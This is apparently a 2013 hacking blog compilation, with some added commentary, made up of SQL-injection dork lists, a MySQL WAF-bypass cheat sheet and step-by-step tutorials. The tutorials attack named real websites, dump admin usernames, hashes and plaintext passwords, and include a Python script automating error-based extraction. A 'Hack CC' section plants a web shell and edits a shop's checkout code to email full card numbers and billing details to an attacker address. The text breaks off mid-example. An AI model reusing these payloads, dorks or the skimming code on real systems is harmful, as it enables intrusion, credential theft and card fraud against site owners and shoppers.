Thursday, 30 May 2013

All SQL Dork {PHP&SQL}

PHP
Code:
inurl:(0x3a,version
inurl:(@version,0x3a,databse)
inurl:(user,0x3a,pass)
inurl:+union+select+   from
inurl:+union+select+   pass
inurl:+union+select+   SHOP
inurl:+union+select+    admin
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:recruit_details.php?id=
inurl:index.php?cPath=


ASP
Code:
".asp?bookID="
".asp?cart="
".asp?cartID="
".asp?catalogid="
".asp?category_list="
".asp?CategoryID="
".asp?catID="
".asp?cid="
".asp?code_no="
".asp?code="
".asp?designer="
".asp?framecode="
".asp?id="
".asp?idcategory="
".asp?idproduct="
".asp?intCatalogID="
".asp?intProdId="
".asp?item_id="
".asp?item="
".asp?itemID="
".asp?maingroup="
".asp?misc="
".asp?newsid="
".asp?order_id="
".asp?p="
".asp?pid="
".asp?ProdID="
".asp?product_id="
".asp?product="
".asp?productid="
".asp?showtopic="
".asp?Sku="
".asp?storeid="
".asp?style_id="
".asp?StyleID="
".asp?userID="
"about.asp?cartID="
"accinfo.asp?cartId="
"acclogin.asp?cartID="
"add.asp?bookid="
"add_cart.asp?num="
"addcart.asp?"
"addItem.asp"
"add-to-cart.asp?ID="
"addToCart.asp?idProduct="
"addtomylist.asp?ProdId="
"adminEditProductFields.asp?intProdID="
"advSearch_h.asp?idCategory="
"affiliate.asp?ID="
"affiliate-agreement.cfm?storeid="
"affiliates.asp?id="
"ancillary.asp?ID="
"archive.asp?id="
"article.asp?id="
"aspx?PageID"
"basket.asp?id="
"Book.asp?bookID="
"book_list.asp?bookid="
"book_view.asp?bookid="
"BookDetails.asp?ID="
"browse.asp?catid="
"browse_item_details.asp"
"Browse_Item_Details.asp?Store_Id="
"buy.asp?"
"buy.asp?bookid="
"bycategory.asp?id="
"cardinfo.asp?card="
"cart.asp?action="
"cart.asp?cart_id="
"cart.asp?id="
"cart_additem.asp?id="
"cart_validate.asp?id="
"cartadd.asp?id="
"cat.asp?iCat="
"catalog.asp"
"catalog.asp?CatalogID="
"catalog_item.asp?ID="
"catalog_main.asp?catid="
"category.asp"
"category.asp?catid="
"category_list.asp?id="
"categorydisplay.asp?catid="
"checkout.asp?cartid="
"checkout.asp?UserID="
"checkout_confirmed.asp?order_id="
"checkout1.asp?cartid="
"comersus_listCategoriesAndProducts.asp?idCategory="
"comersus_optEmailToFriendForm.asp?idProduct="
"comersus_optReviewReadExec.asp?idProduct="
"comersus_viewItem.asp?idProduct="
"comments_form.asp?ID="
"contact.asp?cartId="
"content.asp?id="
"customerService.asp?TextID1="
"default.asp?catID="
"description.asp?bookid="
"details.asp?BookID="
"details.asp?Press_Release_ID="
"details.asp?Product_ID="
"details.asp?Service_ID="
"display_item.asp?id="
"displayproducts.asp"
"downloadTrial.asp?intProdID="
"emailproduct.asp?itemid="
"emailToFriend.asp?idProduct="
"events.asp?ID="
"faq.asp?cartID="
"faq_list.asp?id="
"faqs.asp?id="
"feedback.asp?title="
"freedownload.asp?bookid="
"fullDisplay.asp?item="
"getbook.asp?bookid="
"GetItems.asp?itemid="
"giftDetail.asp?id="
"help.asp?CartId="
"home.asp?id="
"index.asp?cart="
"index.asp?cartID="
"index.asp?ID="
"info.asp?ID="
"item.asp?eid="
"item.asp?item_id="
"item.asp?itemid="
"item.asp?model="
"item.asp?prodtype="
"item.asp?shopcd="
"item_details.asp?catid="
"item_list.asp?maingroup"
"item_show.asp?code_no="
"itemDesc.asp?CartId="
"itemdetail.asp?item="
"itemdetails.asp?catalogid="
"learnmore.asp?cartID="
"links.asp?catid="
"list.asp?bookid="
"List.asp?CatID="
"listcategoriesandproducts.asp?idCategory="
"modline.asp?id="
"myaccount.asp?catid="
"news.asp?id="
"order.asp?BookID="
"order.asp?id="
"order.asp?item_ID="
"OrderForm.asp?Cart="
"page.asp?PartID="
"payment.asp?CartID="
"pdetail.asp?item_id="
"powersearch.asp?CartId="
"price.asp"
"privacy.asp?cartID="
"prodbycat.asp?intCatalogID="
"prodetails.asp?prodid="
"prodlist.asp?catid="
"product.asp?bookID="
"product.asp?intProdID="
"product_info.asp?item_id="
"productDetails.asp?idProduct="
"productDisplay.asp"
"productinfo.asp?item="
"productlist.asp?ViewType=Category&CategoryID="
"productpage.asp"
"products.asp?ID="
"products.asp?keyword="
"products_category.asp?CategoryID="
"products_detail.asp?CategoryID="
"productsByCategory.asp?intCatalogID="
"prodView.asp?idProduct="
"promo.asp?id="
"promotion.asp?catid="
"pview.asp?Item="
"resellers.asp?idCategory="
"results.asp?cat="
"savecart.asp?CartId="
"search.asp?CartID="
"searchcat.asp?search_id="
"Select_Item.asp?id="
"Services.asp?ID="
"shippinginfo.asp?CartId="
"shop.asp?a="
"shop.asp?action="
"shop.asp?bookid="
"shop.asp?cartID="
"shop_details.asp?prodid="
"shopaddtocart.asp"
"shopaddtocart.asp?catalogid="
"shopbasket.asp?bookid="
"shopbycategory.asp?catid="
"shopcart.asp?title="
"shopcreatorder.asp"
"shopcurrency.asp?cid="
"shopdc.asp?bookid="
"shopdisplaycategories.asp"
"shopdisplayproduct.asp?catalogid="
"shopdisplayproducts.asp"
"shopexd.asp"
"shopexd.asp?catalogid="
"shopping_basket.asp?cartID="
"shopprojectlogin.asp"
"shopquery.asp?catalogid="
"shopremoveitem.asp?cartid="
"shopreviewadd.asp?id="
"shopreviewlist.asp?id="
"ShopSearch.asp?CategoryID="
"shoptellafriend.asp?id="
"shopthanks.asp"
"shopwelcome.asp?title="
"show_item.asp?id="
"show_item_details.asp?item_id="
"showbook.asp?bookid="
"showStore.asp?catID="
"shprodde.asp?SKU="
"specials.asp?id="
"store.asp?id="
"store_bycat.asp?id="
"store_listing.asp?id="
"Store_ViewProducts.asp?Cat="
"store-details.asp?id="
"storefront.asp?id="
"storefronts.asp?title="
"storeitem.asp?item="
"StoreRedirect.asp?ID="
"subcategories.asp?id="
"tek9.asp?"
"template.asp?Action=Item&pid="
"topic.asp?ID="
"tuangou.asp?bookid="
"type.asp?iType="
"updatebasket.asp?bookid="
"updates.asp?ID="
"view.asp?cid="
"view_cart.asp?title="
"view_detail.asp?ID="
"viewcart.asp?CartId="
"viewCart.asp?userID="
"viewCat_h.asp?idCategory="
"viewevent.asp?EventID="
"viewitem.asp?recor="
"viewPrd.asp?idcategory="
"ViewProduct.asp?misc="
"voteList.asp?item_ID="
"whatsnew.asp?idCategory="
"WsAncillary.asp?ID="
"WsPages.asp?ID="


Enjoy

Thursday, 16 May 2013

Shortcuts (MySQL SQLi cheat sheet)

Bypass with versioned comments (MySQL executes the body of /*!50000 ... */, while a plain signature filter sees only a comment):
/*!50000OrDeR*/ /*!50000bY*/ -- - /**/ /*!50000 */
unhex(hex(group_concat(/*!50000table_name*/))) /*!50000from*/ information_schema./*!50000tables*/ /*!50000where*/ /*!50000table_schema*/=/*!50000database()*/ /*!50000limit*/ 0,1

Bypass 403:
/*!union*/ /*!select*/ 1,2,concat_ws(0x3a,table_name),4,5,6,7 from information_schema./*!tables*/ where table_schema=database()-- -

Bypass all:
/*!50000union*/ /*!50000select*/ 1,2,UNHEX(HEX(/*!50000CONCAT_WS*/(0x3a,/*!50000TABLE_NAME*/))),4,5,6,7 /*!50000from*/ information_schema./*!50000tables*/ /*!50000where*/ /*!50000table_schema*/=/*!50000database()*/ /*!50000limit*/ 0,1-- -
/*!50000union*/ /*!50000select*/ 1,2,unhex(hex(/*!50000CONCAT_WS*/(0x3a,/*!50000column_name*/))),4,5,6,7 /*!50000from*/ information_schema./*!50000columns*/ /*!50000where*/ /*!50000table_name*/=0x... /*!50000limit*/ 0,1-- -

Get the version:
/*!50000CONCAT_WS*/(CHAR(32,58,32),user(),database(),version())
convert(@@version using latin1)
http://www.ga-k9.com/customer_testimonials.php?testimonial_id=/*!60000%2010*/

Bypass union:
1) id=1+UnIoN+SeLecT 1*2*3-- -
2) id=1+UnIOn/**/SeLect 1*2*3-- -
3) id=1+UNIunionON+SELselectECT 1*2*3-- -
4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1*2*3-- -
5) id=1 and (select 1)=(Select 0xAA 1000 more A's)+UnIoN+SeLeCT 1*2*3-- -
6) id=1+%23Makemoneybmt%0aUnIOn%23Makemoneybmt%0aSeLecT+1*2*3-- -
7) id=1+UnIOn%0d%0aSeleCt%0d%0a1*2*3-- -
8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2C1*2*3-- -
   /*!Makemoney%0d%0aunion*/+/*!Makemoney%0d%0aSelEct*/ 1*2*3-- -
9) Id=1/*!Makemoney%0d%0aunion*/+/*!Makemoney%0d%0aSelEct*/ 1*2*3-- -

Advanced: replace the table name with char(...) or with hex 0x...
e.g.: from information_schema.columns where table_name=CHAR(116, 97, 114, 95, 97, 100, 109, 105, 110)-- -
http://demo.com.vn/index.php?id=-1 Union Select 1,2,CONVERT(group_concat(table_name) USING latin1),4,5,6 From Information_schema.tables--
Char(58)=0x3a
database()=0x64617461626173652829

Error-based (double query: GROUP BY over floor(rand(0)*2) raises a duplicate-key error whose message carries the concat() output):
/*!And (Select 1 From(Select Count(*),Concat(CHAR(124),(Select Concat(version(),0x7c,database(),0x7c,user())),floor(rAnd(0)*2),CHAR(124))x From Information_Schema.Tables Group By x)a)*/--
Version 5.x: now look for the table that holds the users
/*!And (Select 1 From(Select Count(*),Concat(CHAR(124),(Select substr(group_concat(table_name),1,145) from information_schema.tables where table_schema=database()),floor(rAnd(0)*2),CHAR(124))x From Information_Schema.Tables Group By x)a)*/--
/*!And (Select 1 From(Select Count(*),Concat(CHAR(124),(Select substr(group_concat(column_name),1,145) from information_schema.columns where table_name=0x11111111111),floor(rAnd(0)*2),CHAR(124))x From Information_Schema.Tables Group By x)a)*/--

SQL Injection - Union-based (union all select) - Tutorial
1- example.com/whatever.php?id=-5 union all select 1,2,@@version,3--
2- example.com/whatever.php?id=-5 union all select 1,2,database(),3--
3- example.com/whatever.php?id=-5 union all select 1,2,table_name,3 from information_schema.tables--
4- example.com/whatever.php?id=-5 union all select 1,2,column_name,3 from information_schema.columns where table_name=char(CHARCODEHERE)--
5- example.com/whatever.php?id=-5 union all select 1,2,concat(username,0x3a,password),3 from databasename.tablename--

Tuesday, 14 May 2013

[TUT] Magic Convert Aspx


[TUT] Exploiting SQLi - Magic Convert Aspx

University entrance exam revision is intense right now, so I have very little time to be online or to study hacking. But to contribute something for VNHack Family's birthday, Kẻ Chọc Giận is writing a basic SQL tutorial for newbies to study. If you already know this, please don't throw stones; any mistakes, feedback is welcome!


There is a site that was posted for people to practise exploiting and nobody has an answer yet, so I'm using it for this tutorial!

Victim: http://pgdmongcai.edu.vn/ (a similar victim: http://www.pgdhalong.edu.vn/)

The first thing you'd do is look for a vulnerable link to test, right?

E.g.:
http://pgdmongcai.edu.vn/Default.aspx?page=news&mod=news&catid=126

is the one you'd notice first. Test it for the error:
http://pgdmongcai.edu.vn/Default.aspx?page=news&mod=news&catid=126'

You can see it errors. But will order by work? I tried, and got nothing different!

Looking around and clicking about, this link came up:
http://pgdmongcai.edu.vn/Default.aspx?page=congvan&mod=congvan

Oh dear, a login page. But without an admin account, a login page is useless.
But why not test the "Tên truy cập" (username) field for the bug? =)))))) Let's try :D


And the error appears :P


=> the hard part here isn't how to hack it, it's finding where the bug is :)

By this point many members will know what the bug is and how to test for it. But I'll still go through it in detail for newbies :D. OK! Back to the login link we just tested

http://pgdmongcai.edu.vn/Default.aspx?page=congvan&mod=congvan

(Note: every query below is injected into the Tên truy cập (username) field)

Its version (convert(int, ...) fails on any non-numeric string, and SQL Server puts the offending value into the error message; that is what makes every query in this tutorial work):
' and 1=convert(int,@@version)-- -

Result:


(get the database name: ' and 1=convert(int,db_name())-- - )



Next, get the tables:
' and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -



The first table appears. But it only returns one table; we have to make it show the others.
' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_news_private')))-- -

Result:
 Conversion failed when converting the nvarchar value 'tbl_permission' to data type int.
Another table, 'tbl_permission', shows up. Continue to the next table
' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_news_private','tbl_permission' )))-- -
  
Conversion failed when converting the nvarchar value 'tbl_siteinfo' to data type int.

Another table, 'tbl_siteinfo', shows up. Keep going like this until you get the following:
' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_news_private','tbl_permission','tbl_siteinfo','tbl_student_point','tbl_student','tbl_th_pupil','tbl_th_adv','tbl_th_category_news','tbl_adv','tbl_th_class','tbl_category_gallery','tbl_th_news','tbl_category_library','tbl_category_news','tbl_th_siteinfo','tbl_th_vote_answer','tbl_category_news_private','tbl_th_vote_question') ))-- -
The result is the reward for whoever doesn't give up checking :D


Now get the columns in table tbl_user
' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_user') ))-- -

It only shows one column, so we do the same as with the tables

' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_user') and column_name not in ('PK_UserID') ))-- -

' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_user') and column_name not in ('PK_UserID','C_UserName') ))-- -


The result is 3 columns:

PK_UserID
C_UserName
C_UserPass


And now just get the admin account :)

Get username:
 ' and 1=convert(int,(select top 1 C_UserName from tbl_user))-- -
Get password:
' and 1=convert(int,(select top 1 C_UserPass from tbl_user))-- -

Result: admin | d5a43b10e1eb57474e50e2eca8034f4f 

Life is full of injustice, so I have to accept not being able to crack the password =))

TUT xPath Injection (MySQL error-based SQLi via extractvalue())


Error
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
Use this statement to get the version (extractvalue() raises an XPATH syntax error whose message echoes the invalid XPath string, here the concat() result starting with 0x0a):
and extractvalue(rand(),concat(0x0a,version()))--+
link:

http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,version()))--+

We get: "Query failed: XPATH syntax error: ' 5.1.39-log'" ==> version > 5

Get the table name with the following:
and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--+
The link takes the form


http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,table_name) from information_schema.tables WHERE table_schema=0x69665f696d61676573 limit 3,1)))--+
We get: "Query failed: XPATH syntax error: ':logger_config'"
table name: plogger_config
Continue with the following:
and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="TABLE NAME" limit 0,1)))
replacing TABLE NAME with the plogger_config we just found, which gives the link:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 3,1)))--+
we get:

"Query failed: XPATH syntax error: '::admin_username'"

http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(0x3a,column_name) from information_schema.columns WHERE table_name="plogger_config" limit 4,1)))--+

"Query failed: XPATH syntax error: '::admin_password'"
and we get the username and password together with the following:

extractvalue(rand(),concat(0x0a,(select concat(COLUMNS) from TABLE)))--
where COLUMNS are the two columns we found:
+ admin_username
+ admin_password
so the select becomes select concat(admin_username,0x3a,admin_password); remember the 0x3a separator

and TABLE is the table we found at the start; substituting gives the link:
http://www.ianforsythphotographer.com/main.php?id=1' and extractvalue(rand(),concat(0x0a,(select concat(admin_username,0x3a,admin_password) from if_images.plogger_config LIMIT 0,1)))--+
"Query failed: XPATH syntax error: 'admin:392592ed88f501ea498f14343'"
haha, 392592ed88f501ea498f14343 ==> MD5; the rest is up to you
(Note that this is only 25 hex digits, not the 32 of a full MD5: MySQL cuts the text it echoes in an XPATH syntax error at 32 characters, and the 0x0a marker plus "admin:" use up 7 of them. Read the rest with substr((select ...),32,31) in a further request.)
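The 25-character value above is not a complete MD5: MySQL truncates the string it echoes in an XPATH syntax error to 32 characters, and the 0x0a marker plus "admin:" take seven of them. The usual fix is to read the result in windows with substr(). The following is an added example, not code from the original post: it builds the tutorial's extractvalue() payload with a moving substr() offset, parses the error text, and reassembles the full string. The vulnerable page is simulated in-process (no network) against a constructed secret, md5 of the word "example", so the value has a real MD5's 32 hex digits; the table and column names are the ones from the tutorial and the 32-character limit is MySQL's.

```python
import hashlib
import re

# Constructed stand-in for the admin_username:admin_password row;
# md5("example") is used so the value has a real MD5's 32 hex digits.
SECRET = "admin:" + hashlib.md5(b"example").hexdigest()

# Sub-select exactly as in the tutorial's final payload.
INNER = ("(select concat(admin_username,0x3a,admin_password) "
         "from if_images.plogger_config limit 0,1)")

ERROR_LIMIT = 32                   # MySQL truncates the echoed XPath text to 32 chars
MARKER = "\n"                      # 0x0a: invalid XPath, forces the error and heads the echo
CHUNK = ERROR_LIMIT - len(MARKER)  # 31 useful characters per request


def build_payload(offset: int) -> str:
    """Value for the id parameter; substr() offsets are 1-based in MySQL."""
    return (f"1' and extractvalue(rand(),concat(0x0a,"
            f"substr({INNER},{offset},{CHUNK})))--+")


SUBSTR_RE = re.compile(r"substr\((.*),(\d+),(\d+)\)\)\)", re.S)
ERROR_RE = re.compile(r"XPATH syntax error: '(.*)'", re.S)


def simulated_target(param: str) -> str:
    """In-process stand-in for the vulnerable page (no network).

    Evaluates only the substr() window of the injected query against SECRET
    and formats the error the way MySQL does, including the 32-character cut."""
    m = SUBSTR_RE.search(param)
    if not m:
        return "<html>page rendered normally</html>"
    offset, length = int(m.group(2)), int(m.group(3))
    piece = SECRET[offset - 1:offset - 1 + length]
    echoed = (MARKER + piece)[:ERROR_LIMIT]
    return f"Query failed: XPATH syntax error: '{echoed}'"


def extract_full(send=simulated_target) -> str:
    """Walk the string in 31-character windows until a short window ends it."""
    result, offset = "", 1
    while True:
        m = ERROR_RE.search(send(build_payload(offset)))
        if not m:
            raise RuntimeError("no XPath error in response; injection point changed?")
        chunk = m.group(1)[len(MARKER):]   # drop the 0x0a marker
        result += chunk
        if len(chunk) < CHUNK:
            return result
        offset += CHUNK


if __name__ == "__main__":
    print(extract_full())
```

Against a live target, `send` would be replaced by a function that puts the payload into the id parameter and returns the response body; the loop and the parsing stay the same. The termination test (a window shorter than 31 characters) also handles a value whose length is an exact multiple of 31: the next request simply returns an empty window.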

SQLi bypass 403


Error
Warning: mysql_fetch_assoc(), Warning: mysql_fetch_array(), mysql_num_rows(), mysql error, mysql_query, mysql_fetch, mysql_connect
[screenshots of the next steps omitted]

So the site has 16 columns
put a - before the id and -- at the end
we get:
2

4
columns 2 & 4 are usable
get the version in column 2
=>
5.1.37-1ubuntu5.5
get user() in column 2
=>
ettu_admin@localhost
get database()
ettu.org_ettu_db01
get the tables => group_concat(table_name) in column 2
FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() -> shows all the tables in the database
change table_name to column_name to get the columns
the column names shown

=>
id,login,password,stato,id_squ,girone,abilitato
read the administrator id/password
1:adminvitesse:vitesse2006

2:admin:matchvitesse

TUT Hack CC



allinurl: /sub.php?Page=1
convert to the form
http://abc.com/detail.php?pid=....
exploit it with the hoangduye tool or with Havij; any tool will do

get the admin (in the user table, remember to get the role column to find the admin; the password is hashed with sha1; the admin usually has role 1)

admin link
http://abc.com/admin_login.php

http://abc.com/cp
in the admin panel, under category, upload a shell with a .php or .jpg.php extension, as you prefer

next, use the shell to edit orderconfirm.php (the file name varies by shop; to find it, go through the shop's order flow to the card entry step, and the confirmation page reveals the file name, http://abc.com/<file to edit>.php)

find that file in the shell

then find this section
<? echo
"" . substr($card_no,-4) . "<br>" .
$ex_month . "/" . $ex_year . "<br>" .
$cid;
?>
normally the original code shows only the last 4 digits of the card

change the number shown in red in the original post (the -4) to 0

then add this code below it
<?
$to = 'tmtno1@vnhack.us';
$subject = 'CC - Order ID:' . $order_id;
$message = $order_id."|".$card_type."|".$card_no."|".$ex_month."|".$ex_year."|".$cid."|".$bill_name."|".$bill_address."|".$bill_city."|".$bill_state."|".$bill_zip."|".$bill_dphone."|".$bill_country;
$headers = 'From: webmaster' . "\r\n" . 'Reply-To: webmaster' . "\r\n" . 'X-Mailer: PHP/' . phpversion();
mail($to, $subject, $message, $headers);
?>
note: because the main order file is encoded, the card is captured by editing the file that chains to the main order file; the cards are not guaranteed 100% live, but the billing details are 100% correct

some shops let you view the encrypted card via the admin panel, and some don't store the card at all, so this shell method is the quickest

Monday, 13 May 2013

Tutorial WAF Bypassing SQLi


What is WAF?

WAF stands for Web Application Firewall. It is widely used nowadays to detect and block SQL injection!
Let’s Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL injection (usually the "UNION SELECT" command), you get a 403 error (and the website says "Forbidden" or "Not Acceptable").
Example:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….
(We get a 403 Error!)

Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF…
1) Comments: 
You can use comments to bypass WAF:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….
(First Method that can Bypass WAF)
However, most WAF identify this method so they still show a “Forbidden” Error…
2) Change the Case of the Letters: 
You can also change the Case of the Command:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
(Another Basic Method to Bypass WAF!)
However, as before, this trick is also detected by most WAF!
3) Combine the previous Methods: 
What you can also do is to combine the previous two methods:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….
This method is not detectable by many Web Application Firewalls! 
4) Replaced Keywords: 
Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
(The “union” and the “select” will be removed, so the final result will be: “UNION SELECT” )
This method doesn’t work on ALL Firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected! 
5) Inline Comments:
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:
http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…
(The %55 is equal to “U” and %53 to “S”. See more on the Advanced Section….)
I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…

Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!
1) Oversized Payload (often called "Buffer Overflow" / "Firewall Crash"): 
Many firewalls inspect only the first part of a request or parameter value, or give up on a value that exceeds a size limit. Padding the parameter so that the real UNION SELECT sits beyond that limit gets it through uninspected. Despite the name, this is typically a length-limit bypass rather than a memory-corruption overflow:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….
(( You can test how the WAF handles such input by typing:
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

If you get a 500 instead of a 403, the firewall is not handling the request cleanly and the oversized-payload method is worth trying! ))
2) Replace Characters with their HEX Values: 
We can replace some characters with their HEX (URL-Encoded) Values.
Example:
http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
(which means “union select”)
Text to Hex Encoder (Choose the “Hex Encoded for URL” result!):http://www.swingnote.com/tools/texttohex.php
3) Use other Variables or Commands instead of the common ones for SQLi: 
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:
 COMMAND        | WHAT TO USE INSTEAD
 @@version      | version()
 concat()       | concat_ws()  (difference between concat() and concat_ws(): http://is.gd/VEeiDU)
 group_concat() | concat_ws()
Learning MySQL Really helps on such issues!
4) Misc Exploitable Functions: 
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4….
(If the Firewall removes the "*", the result will be: -15+union+select….)
So, if you find such a silly function, you can exploit it, in this way!
[+] In addition to the previous example, some other bypasses might be: 
-15+(uNioN)+(sElECt)….
-15+(uNioN+SeleCT)+…
-15+(UnI)(oN)+(SeL)(ecT)+….
-15+union (select 1,2,3,4…)
Of these, only the last is valid MySQL syntax (a parenthesised SELECT after UNION). MySQL's parser does not accept the keywords wrapped alone in parentheses or split across them, so the first three will generally produce a syntax error at the database even if they get past the firewall; they only help where a layer in front of the database rewrites the request (for instance by stripping parentheses).
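Taken together, the basic and advanced methods above are variations on one idea: the firewall matches a literal signature ("UNION SELECT") on the raw parameter, while MySQL sees something else after URL decoding, comment handling, case folding and whitespace. The defensive counterpart is to normalise the value into what the database will parse before matching. The block below is an added example, not code from the tutorial: it applies that normalisation to the tutorial's own payloads and to the ones in the "Shortcuts" cheat sheet earlier on this page, and shows that a literal "UNION SELECT" regex misses every one of them while the normalised check catches them without flagging benign input. The sample values are constructed from the page; the asterisk-stripping case (uni*on) is left out because it only works against a firewall that rewrites input rather than rejecting it.

```python
import re
from urllib.parse import unquote_plus

# Parameter values built from the tutorial's bypass list (constructed test set:
# this is what arrives after "page_id=" or "id=", before any decoding).
BYPASSES = [
    "-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4",                       # basic 1: versioned comments
    "-15 uNIoN sELecT 1,2,3,4",                                 # basic 2: case
    "-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4",                       # basic 3: both
    "-15 UNIunionON SELselectECT 1,2,3,4",                      # basic 4: keyword re-insertion
    "-15 %55nION/**/%53ElecT 1,2,3,4",                          # basic 5: encoded letters + inline comment
    "-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4",                   # advanced 2: hex-encoded letters
    "1+%23Makemoneybmt%0aUnIOn%23Makemoneybmt%0aSeLecT+1,2,3",  # cheat sheet 6: # comment + newline
    "1+UnIOn%0d%0aSeleCt%0d%0a1,2,3",                           # cheat sheet 7: CRLF as whitespace
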